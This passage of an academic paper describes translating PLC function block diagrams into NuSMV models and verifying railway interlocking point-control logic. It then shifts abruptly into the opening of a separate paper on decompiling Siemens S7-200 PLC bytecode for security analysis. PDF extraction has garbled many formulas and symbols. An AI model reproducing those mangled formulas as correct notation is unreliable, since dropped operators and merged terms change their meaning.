totrue, and to false otherwise. The other way around, the P operator positive edge detection 0 !1recognizes a raising edge . These operators P InOperand N InOperand Out Out are represented in textFBD by Out=N(Operand;In);Out=P(Operand;In)  Comparators For comparing two input values, the following comparison operators may be used: equal ( ==), unequal(<>), greater (>), greater or equal ( >=), less (<), less or equal ( <=). For instance, the operator CMP==IIn1 In2 Out which tests whether two inputs are equal, is represented in textFBD by Out= (In1==In2). Jumps Jump operations can be separated into con- ditional jumps and absolute jumps. Depending on the input value true orfalse , a conditional jump can be expressed by JMP orJMPN , respectively. 
The effect is to set the programcounter to the position marked by Label if the Incondition is true (JMP ) or the Incondition is false (JMPN ), respectively. JMPN InLabel JMP InLabel In textFBD, this is represented by JMP(In;Label );JMPN (In;Label ) An absolute jump corresponds with a goto statement and is simply represented by JMP(true;Label ). Integer math instructions Addition, subtraction or multiplication of two integers is represented in textFBD by !(Out;In1;In2)where!=ADD IorSUB IorMUL I: Move The MOVE operator copies the value at the input to the output: Out=In. For generating the textFBD le, the concept of a circuit variable is very important. These variables are generated when connections between two operands are to be repre- sented. The circuit variables are marked as Livariables (cf. g. 3). Fig. 3 gives an impression of the translation from FBD to textFBD. 2) FBD and textFBD semantics: Leth:FBD!textFBD be a map mapping each FBD element eto its corresponding textFBD representation a=h(e). The order of executing FBD operators in a network is determined by a mapping next: 2FBD!FBD determining which element is executed next, depending on the set of elements already executed. In textFBD, this role is taken by the program counter which can be de ned as a mapping p: textFBD!IN, mapping each statement ato its line number pcin the program. 441 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. _L1 = (int1 == 20); _L2 = ((bool1 & bool2) & _L1); _L3 = (bool3 & bool4); _L4 = (_L2 | L3); result1 = _L4; result2 = _L4;textFBD result1 = ; result2 =(((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)) (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4));tFBD MODULE main VAR pc : 1..2; zyklus : 1..3; result1 : boolean; result2 : boolean; DEFINE MAX_pc := 2; MAX_zyklus := 3; bool1 := true; bool2 := true; bool3 := false; bool4 := true; int1 := 20; ASSIGN init(pc) := 1; init(zyklus) := 1; init(result1) := false; init(result2) := false;NuSMV next(result1) := case pc = 1 : (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)); 1 : result1; esac; next(result2) := case pc = 2 : (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)); 1 : result2; esac; next(zyklus) := case pc=2: case (zyklus+1) <= MAX_zyklus : zyklus+1; 1 :zyklus; esac; 1 : zyklus; esac; next(pc) := case pc+1 <= MAX_pc : pc+1; pc=2 : 1; 1 : pc; esac;& int1CMP ==I 20 bool1 bool2 & bool3 bool4>=1 =result1 =result2FBD ~ ~Figure 3. From FBD to NuSMV An FBD network Nmay be given a transition system T= (C;c0;!)as operational semantics, where Cis the set of FBD con gurations of N,c0is the start con guration, and!is the next-con guration relationship. An FBD con- guration is a triple c= (;e;E )whereis a state of the program variables, eis the element in the network Nto be executed next, and Eis the set of component elements in Nnot yet executed. Correspondingly, a textFBD program Pmay be given a transition systemS= (D;d0;,!)as operational semantics, whereSis the set of textFBD con gurations, d0is the start con guration, and ,!is the next-con guration relationship. A textFBD con guration is a triple d= (;a;pc )where is as above, ais the textFBD statement to be executed next,andpcis the program line in which ais. For the details of how these transition systems are de ned, we refer to [14]. There it is also shown that there is a bijective mapping h:C ! D with the property that h(c0) =d0andc!c0,h(c),!h(c0). 
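As a reading aid (ours, not part of the cited tool chain; the input values are arbitrary), one cycle of the textFBD program from Fig. 3 can be executed directly in Python, with a program counter stepping through the statements and the circuit variables _L1 to _L4 holding intermediate results:

# One cycle of the Fig. 3 textFBD program, executed statement by statement.
env = {"bool1": True, "bool2": True, "bool3": False, "bool4": True, "int1": 20}

program = [                                   # (target, expression) pairs
    ("_L1",     lambda e: e["int1"] == 20),
    ("_L2",     lambda e: (e["bool1"] and e["bool2"]) and e["_L1"]),
    ("_L3",     lambda e: e["bool3"] and e["bool4"]),
    ("_L4",     lambda e: e["_L2"] or e["_L3"]),
    ("result1", lambda e: e["_L4"]),
    ("result2", lambda e: e["_L4"]),
]

for pc, (target, stmt) in enumerate(program, start=1):   # pc plays the role of the line number
    env[target] = stmt(env)
print(env["result1"], env["result2"])                    # True True for these inputs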
Thus, an FBD network and its corresponding textFBD program have isomorphic operational semantics, so they are equivalent in a strong sense. B. From textFBD to tFBD The new tFBD format has the advantage that some circuit variables are avoided, thus reducing the state space for model checking dramatically. A textFBD line in which a new circuit variable is created may be omitted in tFBD under certain circumstances. Then, in each other line of the 442 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. ... tFBD textFBD x = (x , ..., x ), x - Variable; _L = (_L , ..., _L ); f(x) = (f , ..., f )(x);1 n i 1 j-1 1 j-1 j+1 k-1 g(x) = (f , ..., f )(x)_L = (_L , ..., _L ); j+1 k-1d= ( , 1 1 _L = f (x), p+1)1 1 ... d= (i i _L = f (x), p+i)i i , d= (j-1 _L = f (x), p+j-1)j-1 j-1 j-1, ... d = ( ,k op (x, _L ) p+k)2 k,d = (1 1(x, f(x)), p +1) , op1 d = (2 op (x, g(x)), p +2)2 ,2 d= (j op (x, _L), p+j)1 j, d= (k-1 _L = f (x), p+k-1)k-1 k-1 k-1,d= (j-1 _L = f (x), p+j-1)j-1 j-1 j-1, d= (j+1 _L = f (x), p+j+1)j+1 j+1 j+1,Figure 4. Substitution of circuit variables textFBD program where this circuit variable is used, it may be substituted by the corresponding expression. The process is illustrated in Fig. 3. To be more precise, textFBD programs are transformed to tFBD programs in the following way: each textFBD assignment Li=fi(x)of an expression fi(x), wherexis a sequence of arguments, to a circuit variable Liis omitted. Instead, each occurrence of Liin righthand sides of other textFBD statements is substituted by fi(x). Similar to a textFBD program, a tFBD program can be given an operational semantics in the form of a transition systemS0= (D0;d0 0;,!0)whereD0is the set of con gura- tions,d0 0is the start state, and ,!0is the next-state transition function. We refer to [14] for details. The behaviour of textFBD and tFBD transition systems with respect to circuit variables is illustrated in Fig. 4. Clearly, since variables are eliminated, there can be no bijection between the state spaces and thus no isomorphism. Reducing the state space was precisely the motivation for introducing the transformation of textFBD to tFBD. But still, the operational semantics of textFBD and tFBD can be equivalent, albeit in the weaker sense of obser- vational equivalence: they can be strongly bisimilar. LetS= (D;d0;,!)be a textFBD transition system and S0= (D0;d0 0;,!0)the corresponding tFBD transition system. S andS0are strongly bisimilar, ( S  S0), iff there is a relationship BDD0which is a strong bismulation for (d0;d0 0). That means: (d0;d0 0)2Band for all (d;d0)2B we have d,!g2D)9g02D0withd0,!0g0and(g;g0)2B d0,!0g02D0)9g2D withd,!gand(g;g0)2B Fig. 4 shows system states before and after using circuit variables, (1or0 1), respectively, and ( j, or0 2, orkor. 0 3), respectively. The following example shows that there is a problem. Example 1. (Comparing FBD, textFBD and tFBD) Letxandybe two Boolean variables which are combined by conjunction. If the result is true, thenxis set to false by theRoperator. The same happens with y. Ifxandy aretrue in the beginning, tFBD does not yield the expected result (cf. Fig. 5). textFBD FBD tFBDx true truey 0: & yxR Rx y_L1 = x y; R(x, _L1);& R(y, _L1);R(x, ( )); x y R(y, (x y));& & x false falsey 3:x false falsey 3:x false truey 2: Figure 5. 
Example: FBD, textFBD and tFBD synopsis The problem is solved by restricting the use of variables appropriately, forbidding situations where a circuit variable may not be substituted: 1) if an operator with local variables is to be assigned to the circuit variable; 2) if the circuit variable is used as an operand in an operator with local variables. With this restriction, strong bisimilarity between the textFBD and tFBD operational semantics can be shown [14]. Example 2. (Strong bisimulation) Strong bisimulation for the example in Fig. 4 works as follows. B=f(d1;d0 1);:::; (di;d0 1);:::; (dj1;d0 1);(dj;d0 1); (dj+1;d0 2);:::; (dk1;d0 2);(dk;d0 2)g C. From tFBD to NuSMV The main program is shown in MODULE main (cf. Fig. 3). The module may have several sections. For our FBD modeling, the VAR,DEFINE ,ASSIGN andSPEC sections are used: the VAR section for variable declarations; theDEFINE section for de ning symbols for frequently used expressions; the ASSIGN section for describing assignments, 443 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. and the SPEC section for specifying CTL speci cations to be checked in the model. For an example, cf. Fig. 3. For more detail, cf. [14]. A possible program property to be checked may look like this: at the end of the rst cycle, the variables x1;:::;x n should have values a1;:::;a n . Speci cations for a NuSMV model can be written in CTL (Computation Tree Logic), LTL (Linear Time Logic) or PSL (Property Speci cation Language). For example, for specifying the above property in CTL, we have to write CTLSPEC in front of the formula. The property given above then looks as follows. CTLSPEC AG((cycle = 1 & pc = MAX PC)) ((x1 = a1 )& . . . & (xn = an ))) Where the program cycle is determined by the integer variablecycle . A more extended case study is given in the next section. The NuSMV user has the choice between a modular or a atrepresentation of functions. In modular representation, each function is given a separate module. The advantage is that modeling of FBD programs is rather straightforward. The disadvantage is that with each instantiation of a module, the state space grows very rapidly. In at representation, all functions are speci ed in one module so that the state space remains constant when running the model checker. Indeed, this can be quite ef cient. The disadvantage is that the functions have to be (re)modeled by hand, an effort that may only by feasible for small systems. Summing up, the process given above gives isomorphic transformations in the rst two steps, and a strongly bisimilar transformation in the third step. This way, model checking PLC software written in FBD becomes feasible in practice. This is demonstrated in the next section. IV. C ASE STUDY Here we describe how the method is applied in the area of railway automation. We concentrate on FBD software as it is used by one family of PLC-based interlocking systems. Interlocking systems are railway facilities which are used for the central control of points and signals (cf. [15]). They have outdoor and indoor parts. The indoor parts consist of hardware and software. The interlocking software is composed of several com- ponents which are responsible for controlling the various interlocking functions. One such component is a point. Like the other components, it consists of several code modules. These code modules depend on the equipment, but each one is designed for only one point. 
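As an aside, the textFBD-to-tFBD substitution of Section III-B, together with the restriction stated above, can be prototyped in a few lines of Python. The following sketch is ours and simplified: it checks only the second restriction and uses plain textual substitution.

import re

LOCAL_OPS = ("R(", "S(", "N(", "P(")     # operators with local variables (set/reset, edge memory)

# textFBD statements as (target, expression); target None denotes a call such as R(x, _L1).
textfbd = [
    ("_L1", "x & y"),
    (None,  "R(x, _L1)"),
    (None,  "R(y, _L1)"),
]

def to_tfbd(stmts):
    stmts, out = list(stmts), []
    for i, (target, expr) in enumerate(stmts):
        if target and target.startswith("_L"):
            later = [e for _, e in stmts[i + 1:]]
            # restriction 2: keep the assignment if the circuit variable is used as an
            # operand of an operator with local variables
            blocked = any(e.startswith(LOCAL_OPS) and target in e for e in later)
            if not blocked:
                stmts[i + 1:] = [(t, re.sub(rf"\b{target}\b", f"({expr})", e))
                                 for t, e in stmts[i + 1:]]
                continue                 # definition inlined, line dropped
        out.append((target, expr))
    return out

for target, expr in to_tfbd(textfbd):
    print(f"{target} = {expr}" if target else expr)
# Output keeps _L1 = x & y, avoiding the pitfall shown in Fig. 5.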
One function block diagram in such a code module of a point component is responsible for controlling the point. This function block diagram is used here as a use case for demonstrating the veri cation method proposed in this paper. From this module, the corresponding NuSMV model is created using our method. The model is presented below.Description Precondition Expected reaction From a right position, the left direction relays is activated by means of a reposition command, and the reposition pro- cess is activatedModuleIF =Right , ComIF =ReposComModuleIF =Left+S1 After at least 20 ms, the position relays is acti- vated=>,iTime = 20 ModuleIF =S2 After at least 30 ms, protection is activated=>,iTime = 30 ModuleIF =S3 After at least 40 ms, the frog is started to move=>,iTime = 40 ModuleIF =S4 Table I EXAMPLE OF A TEST CASE :MOVING THE FROG OF A POINT LEFT We start with describing the test cases, taken from practice, which are used for checking correctness of the software. The test cases form the basis for constructing the veri cation scenarios. A. Test case description In table I we give a simpli ed description of a test case of the code module for point control. The activation of the point actuator component is checked in four steps before moving the point blade. Each step is represented by a description, a de nition of preconditions (start con guration of the test case), and a de nition of the expected reaction. For better understanding table I, we explain the concept of a variable domain in more detail. In the description of preconditions and expected reactions of a test case, we not only use program variables like iTime , but also variable do- mains like ModuleIF orComIF . A variable domain contains a description of several program variables. This can be better explained using the variable domain ModuleIF as an example. It is de ned in table II. The following variables belong to this domain: bPointPosition, bDirectionRight, bDirectionLeft, bRepetition, bRepositionActive, bPointPositionRelays, bProtection and iTime . If ModuleIF has the value Right , then bPointPosition =1, bDirectionRight =1 and bDirectionLeft =0. Variable domains are used in the description of inter- faces. As shown in table II, the module interface is de- scribed by the variable domain ModuleIF and the variables bPointPosition ,bDirectionRight ,bDirectionLeft , etc. A vari- able domain contains different variable assignments in dif- ferent test cases. In order to enable a clear test case descrip- tion, all variable assignments are listed for each variable do- main. For example, the variable assignments for ModuleIF is de ned by ModuleIF2fLeft, Right, S1, S2, S3, S4, :::g. Thus, the precondition in the rst step of the test case is represented by ModuleIF=Right expressing that the direction relays should be in the right position. This 444 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. ModuleIF - Module Interface Left Right S1 S2 S3 S4 bPointPosition 0 1 bDirectionRight 0 1 bDirectionLeft 1 0 bRepetition 1 0 bRepositionActive 1 bPointPositionRelays 1 0 bProtection 1 0 iTime 0 ComIF - Command Interface ReposCom bComActive 1 bFunction 1 iElement 100 Table II DEFINITION OF INTERFACES - VARIABLE DOMAINS means that, before executing the test case, we must have bPointPosition =1,bDirectionRight =1 and bDirectionLeft =0 (cf. table II). Similarly, at the beginning of the test case, ComIF is de ned as ReposCom . 
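The expansion of a domain value into concrete variable assignments can be written down directly. The following Python fragment is a reading aid of ours (values copied from Table II and the text above) and expands the precondition of the first test step.

# Variable domains of Table II as partial variable assignments (reading aid only).
MODULE_IF = {
    "Right": {"bPointPosition": 1, "bDirectionRight": 1, "bDirectionLeft": 0},
    # further domain values (Left, S1, S2, ...) would be filled in from Table II
}
COM_IF = {"ReposCom": {"bComActive": 1, "bFunction": 1, "iElement": 100}}

def precondition(*partials):
    """Combine the partial assignments of a test-step precondition."""
    assignment = {}
    for p in partials:
        assignment.update(p)
    return assignment

# precondition of the first test step: ModuleIF = Right, ComIF = ReposCom
print(precondition(MODULE_IF["Right"], COM_IF["ReposCom"]))
# {'bPointPosition': 1, 'bDirectionRight': 1, 'bDirectionLeft': 0,
#  'bComActive': 1, 'bFunction': 1, 'iElement': 100}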
If an interface is not speci ed in the precondition of a test case, it assumes its initial value which should be de ned at the beginning of the test table. When describing the preconditions of the 2nd, 3rd and 4th step of the test case, we have the symbol combination => . This means that the test case is based on the previous step. For instance, in the 2nd step, all variables except for iTime have their values from the expected outcome of the 1st step. The latter is described by ModuleIF=Left+S1 . That means thatbPointPosition =0,bDirectionRight =0,bDirectionLeft =1, bRepetition =1 and bPositionActive =1. When adding two or more variables of a variable domain symbolically, it is possible that a variable occurs in the description of both (or all) elements of the sum. In this case, the variable is to be assigned the value of the last occurrence. For instance, bPointPosition is given the value 1 in Left+Right . When describing the preconditions of a test case, we may also assign values to single variables instead of value do- mains. For instance, the variable iTime is assigned different values in the 2nd, 3rd and 4th steps of the test case. The same holds when describing the expected reaction. B. NuSMV Component Model An extract of the NuSMV model of the point component is shown in table III. We show only lines from the tFBD model in which the following program variables change: bPointPosition, bDirectionRight, bDirectionLeft, bReposi- tionActive, bRepetition, bComActive, bFunction, iElement . These are the variables which are used in the speci cation. The variables having no role in our context are denoted by var1, var2, etc. in table III.In the model description as well as in the speci cation, the data are represented in a changed format in order to hide the reference to the original software. The rules for transforming FBD programs into the NuSMV input language are described above in section III. In this section, we show how to represent speci cations as logical formulae. C. Description of veri cation scenarios In the case study, veri cation scenarios are described in CTL. Two parameters are important: 1) the program counter pcwhich assumes the value MAX pcat the end of a program cycle, and is then set to 1 again; 2) the cycle counter cycle . As said before, the test case descriptions of the component serve as basis for formulating the veri cation scenarios. Since a test case is de ned by a precondition and an expected reaction, we may represent this by the following scenario. ModuleIF = Right & ComIF = ReposCom ) (1) AG( (cycle = 1 & pc = MAX pc)) ModuleIF = Left + S1 ) Bearing in mind the interface description in table II, the rst step of the scenario may be represented by the following formula. ((bPointPosition = 1 & bDirectionRight = 1 & (2) bDirectionLeft = 0) & (bComActive = 1 & bFunction = 1 & iElement = 100 ))) AG( (cycle = 1 & pc = MAX pc)) (bPointPosition = 0 & bDirectionRight = 0 & bDirectionLeft = 1 & bRepetition = 1 & bRepositionActive = 1 )) The remaining three formulae are created in a similar way. As mentioned before, the symbol combination => says that the precondition of the current step has to be extended with the expected reaction of the previous step. 
For the 2nd step, we thus have (ModuleIF = Left + S1 & iTime = 20 )) (3) AG( (cycle = 1 & pc = MAX pc)) ModuleIF = S2 ) Alternative representation of the speci cation: If only one formula is to be checked, we may take the variable assignments from the precondition and de ne their values as initial values of the model variables. Then a scenario may be described by the following formula AG( (cycle = 1 & pc = MAX pc)) (4) expected reaction ) With this approach, we build a slightly different NuSMV model where the set of initial states in the model is reduced. As an example, table III shows part of the model which refers to some of the variables of our accompanying test case. There the initial values of the variables bPointPosition, bDirectionRight andbDirectionLeft are de ned using the init clause. In contrast, the variables bComActive, bFunction and iElement are de ned in the DEFINE section because their values are unchanged in the model. 445 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. tFBD . . . 48 R(bRepositionActive, (var10 jvar11 jvar12));. . . 50 R(bRepositionActive, ((((var13 & !var14) & (var15 & !var16)) jvar17) jvar18));. . . 52 R(bRepositionActive, (var13 & !var14) & (var19 >var20));. . . 88 bPointPosition = var1;. . . 96 bRepositionActive = ((var21 & !var22) j((!var21 & !var23) jvar24));. . . 104 bDirectionRight = bPointPosition; 105 bDirectionLeft = !var2;. . . 120 S(bPointPosition, var2);. . . 122 S(bRepetition, var3); 123 R(bRepetition, ((var4 & !var5) j((var6 & !var7) & var8) j ((var7 & !var6) & var9)));. . . 131 R(bPointPosition, var2);. . . DEFINE bComActive := 1; bFunction := 1; iElement := 100; ASSIGN init(bPointPosition) := 1; next(bPointPosition) := case pc = 88 : var1; pc = 120 & var2 : 1; pc = 131 & var2 : 0; 1 : bPointPosition; esac; init(bDirectionRight) := 1; next(bDirectionRight) := case pc = 104 : bPointPosition; 1 : bDirectionRight; esac; init(bDirectionLeft) := 0; next(bDirectionLeft) := case pc = 105 : !var2; 1 : bDirectionLeft; esac; init(bRepetition) := 0; next(bRepetition) := case pc = 122 & var3 : 1; pc = 123 & ((var4 j!var5) j(((var6 & !var7) & var8) j((var7 & !var6) & var9))) : 0; 1 : bRepetition; esac; next(bRepositionActive) := case pc = 48 & (var10 jvar11 jvar12) : 0; pc = 50 & ((((var13 & !var14) & (var15 & !var16)) jvar17) j var18) : 0; pc = 52 & ((var13 & !var14) & (var19 >var20)) : 0; pc = 96 : ((var21 & !var22) j((!var21 & !var23) jvar24)); 1 : bRepositionActive; esac; Table III NUSMV MODEL OF THE POINT COMPONENTD. Veri cation results The textFBD format of the software component under consideration has 165 lines of code. It uses about 100 vari- ables (90 Boolean and 10 integer). The model veri cation was performed on an Intel(R) Xeon(R) CPU 5150 computer with 2,66 GHz and 3,25 GB RAM. A detailed description of the NuSMV model checker may be found in [16] and [17]. Its most important properties are summarized in [13]. The basic steps of NuSMV veri cation work as follows. 
1) in the first step, the model is read; an internal hierarchic representation is set up and stored
2) in the second step, the hierarchic representation is transformed into a flattened representation; it contains only one module in which all modules and processes are instantiated
3) then the BDD variables are generated
4) the flattened model is represented using BDDs
5) after generating the BDD representation, the CTL specifications can be checked
The execution of the first three steps took about 1 second. The execution times for the other two steps were different depending on which of the variants explained above was used.
One model for all scenarios: Formulae (1), (2) and (3) describe how the specification for the first variant of the NuSMV model is constructed. The initial values of the variables in question are not defined in the model. From about 10^65 states, about 10^14 states were reachable. Setting up the BDD-based model took slightly more than half an hour. Checking the specifications took 30 to 80 seconds per formula.
One model for one scenario: In the second case, a model is generated for each scenario. The preconditions for the scenario are initialized in the model. The specification is given in the form of formula (4). In the NuSMV model, about 6000 of the 10^60 states were reachable. Setting up the BDD-based model took about 40 minutes. Checking the specification then took less than 1 second.

V. AUTOMATION OF THE VERIFICATION METHOD
As mentioned before, the CTL specification is set up using the descriptions of the test case and the module interfaces (cf. fig. 2). CTL formulae are easily constructed by combining information from the tables, but this must be done by hand. Creating the NuSMV model, however, is a little more complicated, but it can be automated. With the method described here, an arbitrary FBD program is modeled in a way that makes it possible to verify it with the NuSMV model checker. As mentioned above in section III, we propose to first construct the textFBD model, then the tFBD model, and then the NuSMV model. In what follows, we give a more detailed description of this process.

<N-Statement> ::= ... | <Bitlogic> <BitlogicEnd>                          (1)
<Bitlogic>    ::= ... | A <Operand> <End>                                 (2)
                | A( <End> <Compare> ) <End>                              (3)
                | <Bitlogic> A <Operand> <End>                            (4)
                | <Bitlogic> O <End> <Bitlogic>                           (5)
<Compare>     ::= L <Operand> <End> L <Operand> <End> COMPARETOK <End>    (6)
<BitlogicEnd> ::= ... | <AssignEndN>                                      (7)
<AssignEndN>  ::= = <Var> <End> <AssignEnd>                               (8)
<AssignEnd>   ::= | <AssignEnd> = <Var> <End>                             (9)
Table IV. EXCERPT OF THE GRAMMAR

Figure 6. Example: IL and textFBD formats of an FBD program. IL: A(; L int1; L 20; ==I; ); A bool1; A bool2; O; A bool3; A bool4; = result1; = result2. textFBD: _L1 = (int1 == 20); _L2 = ((bool2 & bool1) & _L1); _L3 = (bool4 & bool3); _L4 = (_L3 | _L2); result1 = _L4; result2 = _L4;

A. Constructing the textFBD format
This is the first step in verifying an FBD program. The textFBD representation is generated from the IL representation of the program. IL is a machine-oriented PLC programming language, and each FBD program can be represented in IL. The range of textFBD statements is equivalent to that of FBD statements (cf. [12]). The IL format of an FBD program can be transformed to textFBD using a context-free grammar. An excerpt of it is shown in table IV.
In the table, transformation rules are shown as they are used for transforming the network in gure 3. The IL format of the network is shown in gure 6. The example network may be considered as a complex statement consisting of a logical bit operation followed by two assignments (cf. rule (1) in table IV). A logical bit operation always has an output. Since no dangling lines may exist in a network, this output must be consumed in some way. In our case, the logical bit operation ends with assignments (cf. rule (7)). To enable using two such assignments, rules (8) and (9) are needed. Among the logical bit operations, we have a comparison of two integers (rule (6)). If the result of this operation is to be combined with the AND of two further Boolean variables, rst rule (3) and then rule (4) must be applied. An AND operation of two Boolean variables can be recognized using rules (2) and (4). Rule (5) describes how two logical bit operations can be combined with an ORoperation. The circuit variables in the textFBD le ( Livariables)are generated when connections between two operands are to be represented (cf. g. 6). Such a variable is generated when the recognition of an FBD operand is terminated. In our example, this means the following. As soon as the comparison is recognized, L1is generated. Then the recognition of the AND operation follows (until the ORoperation is read), with the subsequent generation of L2. In order to execute the ORoperation, the subsequent AND operation ( L3) is needed. Only thenL4is generated as a disjunction of L2and L3. Finally, the result of the logical bit operation in variable L4is assigned to the variables result1 andresult2 . On the basis of the grammar and the circuit variable concept, textFBD les are generated. B. Constructing the tFBD format Although the textFBD format of the FBD program can be transformed to NuSMV directly, we rst minimize the model in order to minimize the NuSMV state space. As shown in section III, we may do away with many circuit variables and thus reduce the model size. This substitution is expressed in the tFBD format of the FBD program. For constructing the tFBD format, only the list of FBD operations is needed which use local circuit variables. When transforming a textFBD le, each statement is checked whether it uses an operator from the list. If yes, it is copied into the tFBD le without change. Otherwise, we rst substitute the circuit variable (cf. g. 2). C. Constructing the NuSMV model Transforming a tFBD le to the NuSMV input language has been treated above in subsection III-C. We have shown how to represent tFBD statements by NuSMV transfor- mation rules. In order to complete a NuSMV model, the variable declarations have to be added (cf. g. 2). VI. C ONCLUSION In this paper, we present a method for the automated formal veri cation of PLC software. In particular, we look at FBD software. In order to verify the software, we propose to represent the graphical SPS programming language textually in two observationally equivalent ways: textFBD and tFBD. From the latter format, we derive a NuSMV model. Its state space is dramatically smaller than that of a NuSMV model directly derived from textFBD, so that applications of practical size can be model checked. The method was put to the test in the area of railway automation. In a case study, a component of an interlocking software, the logic controlling a point, was veri ed. The de- sign of the model as well as the construction of the NuSMV model were automated. 
With this successful project, we 447 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. are con dent to pave the way for applying the method in practice. There are two important aspects in applying formal ver- i cation in practice: 1) the method should be applicable to relatively big and realistic models; 2) the execution times should be acceptable. The 1st point is satis ed by our method because the case study is directly taken from practice, without any omissions or abstractions which would make it more academic . As for the 2nd point, the execution times for setting up and transforming the model and veri- fying the speci cations are acceptable. It is true that they are greater than what simulations would take. But there is a fundamental difference between simulation and veri cation where the entire state space is being explored. Our realistic case study is an important step to convince not only railway engineers that automated formal methods are practical. The next step in applying our methods should be a state-based speci cation. This way, the advantage of our method would become even more evident. REFERENCES [1] W. Giessler, SIMATIC S7 SPS-Einsatzprojektierung und - programmierung . VDE Verlag GMBH, 2005. [2] International Electrotechnical Commission, International Standard 61131-3, Programmable controllers - Part 3: Pro- gramming languages , 2003. [3] A. Mader and H. Wupper, Timed automaton models for simple programmable logic controllers, in Proc. of 11th Euromicro Conference on Real Time Systems , 1999, pp. 114 122. [4] M. Heiner and T. Menzel, A Petri net semantics for the PLC language Instruction List, in Proc. of the International Workshop on Discrete Event Systems (WoDES) , 1998, pp. 161 166. [5] G. Canet, S. Couf n, J. j. Lesage, and A. Petit, Towards the automatic veri cation of PLC programs written in Instruction List, in IEEE International Conference on Systems, Man and Cybernetics , 2000, pp. 2449 2454. [6] O. Pavlovic, R. Pinger, M. Kollmann, and H. Ehrich, Princi- ples of formal veri cation of interlocking software, in Proc. of the 6th Symposium on Formal Methods for Automation and Safety in Railway and Automotive Systems (FORMS/FORMAT 2007) , E. Schnieder and G. Tarnai, Eds. GZVB, 2007.[7] O. Pavlovic, R. Pinger, and M. Kollmann, Automation of formal veri cation of PLC programs written in IL, in Proc. of 4th International Veri cation Workshop in connection with CADE-21 , B. Beckert, Ed. CEUR-WS.org, 2007. [8] , FBD-based PLC veri cation demonstrated on inter- locking software, in International Conference : ERTS EM- BEDDED REAL TIME SOFTWARE 2008 , S. 01/02/2008, Ed. [9] M. J. Song, S. R. Koo, and P.-H. Seong, Veri cation method for the FBD-style design speci cation using SDT and SMV, inIASTED Conf. on Software Engineering , 2004, pp. 206 211. [10] K. Y . Koh, E. K. Jee, S. J. Jeon, P. H. Seong, and S. D. Cha, A formal veri cation method of Function Block Diagrams with tool supporting: Practical experiences, in Annals of DAAAM for 2008 & Proceedings of the 19th International DAAAM Symposium , 2008. [11] Working with STEP 7 V5.3 , SIEMENS, 2004. [12] Function Block Diagram (FBD) for S7-300 and S7-400 Programming , SIEMENS, 2004. [13] A. Cimatti, E. Clarke, F. Giunchiglia, and M. Roveri, NuSMV: a new symbolic model veri er, International Journal on Software Tools for Technology Transfer , vol. 2, 2000. [14] O. 
Pavlovic, Formale Veri kation von Software f ur speicher- programmierbare Steuerungen mittels Model Checking . TU Braunschweig, 2009, Dissertation. [15] J. Pachl, Systemtechnik des Schienenverkehrs. Bahnbetrieb planen, steuern und sichern . Vieweg+Teubner, 2008. [16] R. Cavada, A. Cimatti, C. Jochim, G. Keighren, E. Olivetti, M. Pistore, M. Roveri, and A. Tchaltsev, NuSMV 2.4 User Manual , CMU and ITC-irst, http://www.nusmv.irst.itc.it. [17] R. Cavada, A. Cimatti, G. Keighren, E. Olivetti, M. Pistore, and M. Roveri, NuSMV 2.2 Tutorial , CMU and ITC-irst, http://www.nusmv.irst.itc.it. 448 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply.
A_technique_for_bytecode_decompilation_of_PLC_program.pdf
Programmable logic controllers (PLCs) are the kernel equipment of industrial control systems (ICS), as they directly monitor and control industrial processes. Recently, ICS has been suffering from various cyber threats, which may lead to significant consequences due to its inherent characteristics. In IT systems, decompilation is a useful method to detect intrusions or to discover vulnerabilities; however, it has not yet been developed for ICS. In this work, we present a technique to decompile the bytecode of PLC programs. By introducing the instruction template and the operand template, we propose a decompiling framework, which is validated on 11 PLC programs. In the disassembling experiments, the presented framework covers all instructions with a disassembling accuracy of 100%, which fully shows that our framework is able to effectively decompile the bytecode of PLC programs.
A Technique for Bytecode Decompilation of PLC Program Xuefeng LV, Yaobin Xie, Xiaodong Zhu, Lu Ren State Key Laboratory of Mathematical Engineering and Advanced Computing Zhengzhou, China [email protected], [email protected], [email protected], [email protected] Keywords programmable logical controller; bytecode; decompilation; mapping rules. I. I NTRODUCTION Programmable logical controller (PLC) is widely used as terminal control equipment in industrial control system (ICS), and is playing a central role in the whole system. With various software and hardware techniques from IT system applied to ICS, ICS is suffering from more and more cyber threats, thus physical isolation will not prev ent ICS from been attacked. This years, ICS cyber security incidents emerge in an endless stream[1-3], forcing researchers to focus their eyes on ICS security. In 2010, the Stuxnet [4] worm was detected to have invaded the Bushehr nuclear power station in Tran and have caused severe impact. Stuxnet finally destroyed the centrifuges by infecting PLCs and controlling the speed of centrifuges, this clearly shows that PLC can be attacked and can be maliciously exploited. Thankfully, security of PLC program is getting more and more attention[5-8]. Model checking[9] is a frequently-used method used for formalized verification of PLC programs[10-12], but it can only handle source code but not binary code, hence we cannot determine whether the running program is infected or not. Industrial intrusion detection[13-16] technology also has limitations to deal with complicated intrusion such as advanced persistent threat (APT). Therefore, it s necessary to have deep insight into the binary code of PLC program. It is hard to directly analyze the bytecode, however, it would be much easier if the bytecode were firstly decompiled. Decompilation has wide usage in IT system, while in ICS, as little attention has been paid to its security in the early times, there is few related studies. This paper proposes a technique for bytecode decompilation of PLC program. Since PLCs of various brands have different architecture and instruction set, we just take Simens S7-200 series PLCs as our research objects. The target language of decompilation is STL, a supported programming language of Simens S7-200 series PLCs. The remainder of this paper is organized as follows. Section 2 presents a simply introduction of PLC programming languages. Section 3 gives detailed analysis of the mapping rules between S7-200 instructions and the corresponding bytecode. In section 4, we provide a decompilation framework, and 